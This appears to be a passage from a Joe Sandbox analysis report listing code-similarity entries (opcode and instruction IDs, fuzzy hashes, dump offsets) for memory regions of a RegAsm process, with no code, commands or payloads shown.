                                                  • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                  • Instruction ID: fa3146c6d2f51414ee8a9e3f103bb14bfae734daf5d02300d94eaac6341951cf
                                                  • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                  • Instruction Fuzzy Hash: DF014736200601DFDB21DA69C840F93B7EAFFC1300F045819E642CB658DBB4F884DB90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 85da9e4edfb550511842ce1ebc30073242f658a1bd88bdd36e5173ccbdcad4ea
                                                  • Instruction ID: f17febdce287ab7699510e99ea15547b9c6c69dbc6f855320a1b32c85ce7335f
                                                  • Opcode Fuzzy Hash: 85da9e4edfb550511842ce1ebc30073242f658a1bd88bdd36e5173ccbdcad4ea
                                                  • Instruction Fuzzy Hash: BF1179B9A083089FC700DF6DC44195BBBE4EF89754F00895AF958D73A0E630E911CBA2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 22667bd6acbe4b164adae91646c4a9ac420a1e1fb9693077a53dde51f18a444e
                                                  • Instruction ID: 3cc2ee46cbf31554125a5e67ffe5d2cbddd9f337c2699095a5e01d89f5b1308f
                                                  • Opcode Fuzzy Hash: 22667bd6acbe4b164adae91646c4a9ac420a1e1fb9693077a53dde51f18a444e
                                                  • Instruction Fuzzy Hash: D001843DB10618DFCB08EB6ADC149AF77EAEF80628F5940699D05E7640DE60DD05C691
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                  • Instruction ID: 136b2e81b7b80a56df38dee667dca8c8ad3d7f8f674d1d6a8d40558a2c3fceaa
                                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                  • Instruction Fuzzy Hash: 45017C3E208584DFE322861DC958F3677E8FB44758F0D04A1F909CBA91DB28DC40C662
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b3c68cc0e44288d6bd8a30cbc95c6a498bed2c3131e23a87274c3e78c30eb6e4
                                                  • Instruction ID: c9bd1a398af453531c94743b876f57c888e5cc460b0fff9f990081caaa98987f
                                                  • Opcode Fuzzy Hash: b3c68cc0e44288d6bd8a30cbc95c6a498bed2c3131e23a87274c3e78c30eb6e4
                                                  • Instruction Fuzzy Hash: 6201F2B9280700AFD3316F19D840F22BBE9DF45B50F10086AB746DF3A0C6B09840CB89
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d71e261e75543c338e85145f17939c3e01ca37315eb7ef3e9c6f362f02868d14
                                                  • Instruction ID: 61888c90a6c229c19233c06adb1edb010b5412dcb86ef5796923a0eb1443e7b6
                                                  • Opcode Fuzzy Hash: d71e261e75543c338e85145f17939c3e01ca37315eb7ef3e9c6f362f02868d14
                                                  • Instruction Fuzzy Hash: CDF0F43A641A20BBD7319B5A8D50F17BAAAEB84F90F004068BA09D7640DA30ED01CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f164cdb3d1c0461e0996e69daa2894bcf93c35069f71a2ad990dd46cf27162b
                                                  • Instruction ID: 711c2395318619146babd5cf5149733918e3e583966d13dd5b1309fc18c79e56
                                                  • Opcode Fuzzy Hash: 9f164cdb3d1c0461e0996e69daa2894bcf93c35069f71a2ad990dd46cf27162b
                                                  • Instruction Fuzzy Hash: E1017C75E00209AFCB00DFA9D551AAEB7F8EF48344F50806AF910E7390D674AE01CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eca534be348d384635227da9e39ce812e22910badc454fdabfe1dc6206d5d708
                                                  • Instruction ID: 5201cd355b2298f2c107e26e4370f3fb11346eb01a220a77189d85b1daa4b5e9
                                                  • Opcode Fuzzy Hash: eca534be348d384635227da9e39ce812e22910badc454fdabfe1dc6206d5d708
                                                  • Instruction Fuzzy Hash: E0017C75E00219AFCB04DFA9D451AAEB7F8EF58304F10806AF900E7350D674AA01CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                  • Instruction ID: 57d394c1351a15dbc78a06d825287740343581b363c11f89a5ded4c05f3e8326
                                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                  • Instruction Fuzzy Hash: 65F0FC7F20762A9BD7321A5D4840B2BE59E8FC5B6CF1D0077F209DB600CE648C0197D5
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c2a7a0ea97d5e5b9982fc15ad5f4862acb4f2c314d5ae4e136846ccad3ba160
                                                  • Instruction ID: e4e48d13f283390ce29f2cd47424b24e0ec09435fda412c112268769050588b5
                                                  • Opcode Fuzzy Hash: 1c2a7a0ea97d5e5b9982fc15ad5f4862acb4f2c314d5ae4e136846ccad3ba160
                                                  • Instruction Fuzzy Hash: AF017C75E10209AFCB00DFA9D551AAEB7F8EF48304F10406AF910E7350D634AA01CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                  • Instruction ID: b41d3bc4735a7fdda4780c1ad710e90f8e0d8dcffc7d6f64a0654758f74465a4
                                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                  • Instruction Fuzzy Hash: A9F062BA600A15ABD334CF4DDC40E67F7EADBC4B94F058129E559D7220EA31DD05CB90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                  • Instruction ID: 9ac637725252d8f983cc36c05d5e977bac363497d2a9faef5f63169ba46d20b3
                                                  • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                  • Instruction Fuzzy Hash: 6301F43E2406889BD337A71DC809F59BB99EF41758F1880A6FA18DB6A1D779DC10C621
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                  • Instruction ID: c4b2b79af2fb40dcfb54b9326aff430e1349b601d12c4535cc140d5e34d97737
                                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                  • Instruction Fuzzy Hash: 27F0127610001DBFEF019F94DD80DAF7B7EEB45798B104165FA11D2160D635DD21ABA1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c8c31c5687cfef238fa6caa80321dda5689b8ab28feaa22a420db44b4406ade
                                                  • Instruction ID: f63a71f72cbdfe7e483d9279f591db9973a59eb1b04a715d656751d56fb803b2
                                                  • Opcode Fuzzy Hash: 3c8c31c5687cfef238fa6caa80321dda5689b8ab28feaa22a420db44b4406ade
                                                  • Instruction Fuzzy Hash: 86017C75E002589FCB00DFA9D855AAEB7B8AF48314F14405AE501E7280D734EA01CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dbd160541423d336ed1a23cc4bafb7d902bd0c0fca436f9ac2616c86f98d10e0
                                                  • Instruction ID: 14a77fbbb505ab4e89642f1db44615cf5a71e520a4520a8f2c61b4ffc14424a5
                                                  • Opcode Fuzzy Hash: dbd160541423d336ed1a23cc4bafb7d902bd0c0fca436f9ac2616c86f98d10e0
                                                  • Instruction Fuzzy Hash: 8301853A500109ABCF129E84D840EEA3BA6FB4C764F068101FE18A6220C336E970EB81
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec43cc1f9fccdcee02ce9fe4e43505a8101389dc808cc4d56804226003db97b3
                                                  • Instruction ID: 218ed2ffdd3ac0fd17110def29da5853283259f827e5f0fb4ce2961fc01dbabb
                                                  • Opcode Fuzzy Hash: ec43cc1f9fccdcee02ce9fe4e43505a8101389dc808cc4d56804226003db97b3
                                                  • Instruction Fuzzy Hash: CBF0247D2052189BF720961A9D01B23B29EEBE4754F25802BEB09CB2D0FFB0DC45C394
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e136305a3a2a913b86c7ea6999f71ebbe2a5574f24ef1c6d9a6d9c4f50b31c95
                                                  • Instruction ID: d9b166fcea8ba9d60d45fb8d029e1f1e9ec8606972b740f1a0affbde73e42dc3
                                                  • Opcode Fuzzy Hash: e136305a3a2a913b86c7ea6999f71ebbe2a5574f24ef1c6d9a6d9c4f50b31c95
                                                  • Instruction Fuzzy Hash: B001F47C604684DBE332AB7CDC18F2633E8AF40B48F580194FA04DB6D6E738D441C511
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                  • Instruction ID: 4ef9c84248bed7d5a43c0e700b3e8b2ff72090585866661a58c75b851380e4b3
                                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                  • Instruction Fuzzy Hash: 33F0893D74191347DBB5AA29A420F2BA3D69FC0F54B0D053E9759CB680EF50D801CB91
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cad661ad6f3621d078c3d5f44f19259f97932f6a616bd10ed709a9ff1fede7f2
                                                  • Instruction ID: 2ab10718a7ef922a7e26f275c87d4de1304ea03b8bb14c421e53c0e652279261
                                                  • Opcode Fuzzy Hash: cad661ad6f3621d078c3d5f44f19259f97932f6a616bd10ed709a9ff1fede7f2
                                                  • Instruction Fuzzy Hash: 31F0C8796053049FC710EF68C445E1FB7E4EF48704F44465AB898DB390E634E901CB56
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                  • Instruction ID: 64f98ed9895e76734fa79a8f396eba5eb3ad03afcb021790fe8ff9cb6ca7687e
                                                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                  • Instruction Fuzzy Hash: EEF05E3E7916519BD3319A4EDC80F16B3A9AFC5B64F190065A908DF260C760EC45CBD0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                  • Instruction ID: 8cd82fe9a8f514787ab39a32685d1acce9ee33a0b31b725fbe7b089a79a275fd
                                                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                  • Instruction Fuzzy Hash: C7F02E7A600204AFE724EB25CD00F96B2EAEF98304F1480789944C72B0FAB0EE40CA95
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 474dc11a73be73f87bbdd50af82c8211bbb03d4a1cb4c379f08fc65e0a2aa629
                                                  • Instruction ID: 5e663e1a1e926747c10e70723975acde282fe4c94d111e6787198a6943d93923
                                                  • Opcode Fuzzy Hash: 474dc11a73be73f87bbdd50af82c8211bbb03d4a1cb4c379f08fc65e0a2aa629
                                                  • Instruction Fuzzy Hash: C4F04F78A11249AFCB04EFA9C515A6EB7B5EF18304F108056B955EB385DA38EA01CB51
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a18caa23febb458625ede48f86a3045002c5ce8476bb7cdfe59ceff882a5c539
                                                  • Instruction ID: e4afe629a93db0858e8acc4d1a73c17549db9271336bed6ad70a9a6bad273f80
                                                  • Opcode Fuzzy Hash: a18caa23febb458625ede48f86a3045002c5ce8476bb7cdfe59ceff882a5c539
                                                  • Instruction Fuzzy Hash: 00F0903D9126F49FD7218F58C848B6277D49B08728F08496ADC6DC7601C768D8C4C651
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ab2e3ec3f068b98f655d73619b9705d3af93f207198f08085d7bae6f3e66b22
                                                  • Instruction ID: afd76bbdd11eb463222d8def6db8df8979d47a513c29cae4d82b5e030eb42c10
                                                  • Opcode Fuzzy Hash: 6ab2e3ec3f068b98f655d73619b9705d3af93f207198f08085d7bae6f3e66b22
                                                  • Instruction Fuzzy Hash: DEF027AA8196C85ACB226B38A4907A17F9D9783214F191889CCA057200CBB988D3CA24
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                  • Instruction ID: 89e34db406f7ef319ad3c97a8a029d2fcd6a567c415d021a30b10de2d8fdce4e
                                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                  • Instruction Fuzzy Hash: 0BE0923A3006002BDB129E5D8CC4F57776E9FC2B10F080079B9049E252CAE69C1986A5
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 37bf6044563aef58a154a3ba39456f2446028271651bd9d19faa3d17bf18d13c
                                                  • Instruction ID: 86556bea655b57df61fffff7c97e0c2013485f4ccdf7687bec61173eb02993de
                                                  • Opcode Fuzzy Hash: 37bf6044563aef58a154a3ba39456f2446028271651bd9d19faa3d17bf18d13c
                                                  • Instruction Fuzzy Hash: 6DF0E27D5116659FD32AF768C148B22B3D49B407A8F08A47FD40EC751BC760C880CA71
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                  • Instruction ID: cabcbb3778464bfbd5a3ff73baef2ba3d9fbbda40e3f1f1de98879e4fa86d965
                                                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                  • Instruction Fuzzy Hash: F6F037751042249FE7209F45D944F52B7EDEB16768F45C025E609DB550E379EC40CB94
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                  • Instruction ID: 1576d2dc827ad41ead3062e1ddf764cba1b6367d8d940224c7648ba6c7a77046
                                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                  • Instruction Fuzzy Hash: BFF0E53D2047549FEB15CF15D050AE57BE5EB45354B004494FC46CB341DB36E982CF44
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                  • Instruction ID: 0195fcc5de8e4b8edaa2644874f54cbe51b39d2c7d6d3d462d104c68ab8d61d5
                                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                  • Instruction Fuzzy Hash: CCE0D83F24414AEBC7213A598800B6677A6DBC07A0F150429E244CF151DB74DC50E7D8
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70924132f8f7b5cead10540395166f8962bf72c84a6cc5f578b54a1ff65b484e
                                                  • Instruction ID: 48f0d075edf812414592baaad8b3d3e562f83e5178a08c468c3f7f3fc029b186
                                                  • Opcode Fuzzy Hash: 70924132f8f7b5cead10540395166f8962bf72c84a6cc5f578b54a1ff65b484e
                                                  • Instruction Fuzzy Hash: BBF02B359255F04FEB71D728E244F5673E9AF20B34F1A25A4D404D791BC720DC88C650
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                  • Instruction ID: 0ce00746263f404868c1c44a4db7e060a0e5262e4f5532dc32eb4c135062c297
                                                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                  • Instruction Fuzzy Hash: 9AE0DF3AA00120BBDB21AB9A8D05F9ABBADDB80FA8F050154B700E7090E530EE00CA90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                  • Instruction ID: ebe8464a7d712a376e7ebd978bd615edf1a306f02152067dc4bf4ca59a33a168
                                                  • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                  • Instruction Fuzzy Hash: BCE09B316403608BCB248A19C144B53B7EDDFE5764F658069D90947616C332F85AC6D0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                  • Instruction ID: 8e4f1365d2a8ea27d086b0433e1a7ba90894bf8498bb2d7d8c7866c6d58bb828
                                                  • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                  • Instruction Fuzzy Hash: 53E06D39010610DFDB366B29D948B56B6E6AF40715F148829A09A414F0C77498C0CA81
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 33c128da7d6ae0cbb7b8706de7da07f96512a19fd1f0ce174a29b2ef7569de50
                                                  • Instruction ID: c9f4a06c68147f85f7c91362cedac1925976c89a56c141ba49816ed52409454e
                                                  • Opcode Fuzzy Hash: 33c128da7d6ae0cbb7b8706de7da07f96512a19fd1f0ce174a29b2ef7569de50
                                                  • Instruction Fuzzy Hash: 99E0927A100694ABC722BF2DDD01F9A77DBEB50764F014515B515971A4CA30AC50CB89
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                  • Instruction ID: 3102e43a284dfd1abc2617d34fa4730e35ab6110585b202c11371b213e41de54
                                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                  • Instruction Fuzzy Hash: 3DE0C2383003059FD755CF1AC084B6677B6BFD5A14F68C068A8488F205EB32E842CB40
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                  • Instruction ID: f35159364f488cdd932719bf2e510e9a71bd054356f29f61e804bd3812600d61
                                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                  • Instruction Fuzzy Hash: 93E08C3D401A28EFEB312E29DC00F5176A2FF44F20F144829F885960A88B70ACC1DF45
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
